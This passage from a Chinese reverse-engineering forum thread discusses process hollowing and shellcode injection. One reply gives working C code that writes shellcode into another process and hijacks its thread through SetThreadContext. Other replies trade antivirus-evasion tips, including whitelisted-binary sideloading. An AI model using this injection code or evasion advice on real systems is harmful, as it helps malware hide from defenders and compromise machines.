能力值:
( LV4,RANK:50 )
|
-
-
26 楼
SetThreadContext不被杀就牛B了
|
能力值:
( LV2,RANK:10 )
|
-
-
27 楼
围观一众大牛
|
能力值:
( LV2,RANK:10 )
|
-
-
28 楼
学习思路,能否被干掉先不说。
|
能力值:
( LV15,RANK:280 )
|
-
-
29 楼
既然申请了新空间VirtualAllocEx,既然WriteProcessMemory,又何必需要unmap原有的代码呢。
DWORD pid,tid,orgEip;
HANDLE hThread;
PVOID mem_base;
CONTEXT ct;
BOOL bRet = FALSE;
pid = GetProcessId( hProcess );
tid = FindMainThreadId( pid );
hThread = OpenThread( THREAD_ALL_ACCESS,FALSE,tid );
SuspendThread( hThread );
ct.ContextFlags = CONTEXT_FULL;
GetThreadContext( hThread,&ct );
orgEip = ct.Eip;
mem_base = VirtualAllocEx( hProcess,NULL,sc_len,MEM_COMMIT,PAGE_EXECUTE_READWRITE );
printf("%x\n",mem_base);
bRet = WriteProcessMemory( hProcess,mem_base,shellcode,sc_len,NULL);
if(!bRet)
{
printf("WriteProcessMemory failed. Error code: %d",GetLastError());
}
ct.ContextFlags = CONTEXT_FULL;
ct.Eip = (DWORD)mem_base;
SetThreadContext( hThread,&ct );
ResumeThread( hThread );
CloseHandle( hThread );
return TRUE;
这段代码完成的功能是一样的。
|
能力值:
( LV2,RANK:10 )
|
-
-
30 楼
学习了,哈哈
|
能力值:
( LV12,RANK:210 )
|
-
-
31 楼
WriteProcessMemory
SetThreadContext
动作太大了
|
能力值:
( LV2,RANK:10 )
|
-
-
32 楼
虽然杀着,依然是学习的对象
|
能力值:
( LV6,RANK:90 )
|
-
-
33 楼
这个方法很久前就有了 但是支持下
|
能力值:
( LV3,RANK:30 )
|
-
-
34 楼
这不是傀儡进程,这是偷梁换柱
|
能力值:
( LV4,RANK:40 )
|
-
-
35 楼
用来注入其实是很不错的~
|
能力值:
( LV4,RANK:50 )
|
-
-
36 楼
强悍,感谢楼主分享
|
能力值:
( LV3,RANK:20 )
|
-
-
37 楼
收藏.......................
|
能力值:
( LV2,RANK:10 )
|
-
-
38 楼
好东西。先收藏了。
|
能力值:
( LV2,RANK:10 )
|
-
-
39 楼
学习,mark一下
|
能力值:
( LV2,RANK:10 )
|
-
-
40 楼
学习下思路还不错
|
能力值:
( LV6,RANK:90 )
|
-
-
41 楼
楼主大神,学习了~
|
能力值:
( LV7,RANK:100 )
|
-
-
42 楼
练手,学习学习
|
能力值:
( LV2,RANK:10 )
|
-
-
43 楼
mark
|
能力值:
( LV2,RANK:10 )
|
-
-
44 楼
顶一个,老技术,精神鼓励。
|
能力值:
( LV4,RANK:40 )
|
-
-
45 楼
我想说,我写的都能过.为毛呢.
|
能力值:
( LV13,RANK:1760 )
|
-
-
46 楼
白加黑就能过
|
能力值:
( LV4,RANK:40 )
|
-
-
47 楼
已经放弃了进程替换了,太垃圾了,主要是WIN764跑不起来,还不如白加黑通用!
|
能力值:
( LV13,RANK:1760 )
|
-
-
48 楼
WIN7x64我还木有测试过,不过我之前弄得白加黑也是和进程替换结合起来的, 只不过不是一个exe替换,直接把shellcode写入目标进程,然后修改入口点,这样效果比较好.
|
能力值:
( LV13,RANK:1760 )
|
-
-
49 楼
特征码不是难事,构造的巧妙主防照样过,数字稍微麻烦点而已
|
能力值:
( LV4,RANK:40 )
|
-
-
50 楼
往目标进程写shellcode,改入口点.动作太大了吧..不过.这段代码我想要一份,如果愿意的话加我.QQ2745459923(请备注看雪,).共同交流,可以分享一下思路,我也有好思路哦, !
|
|
|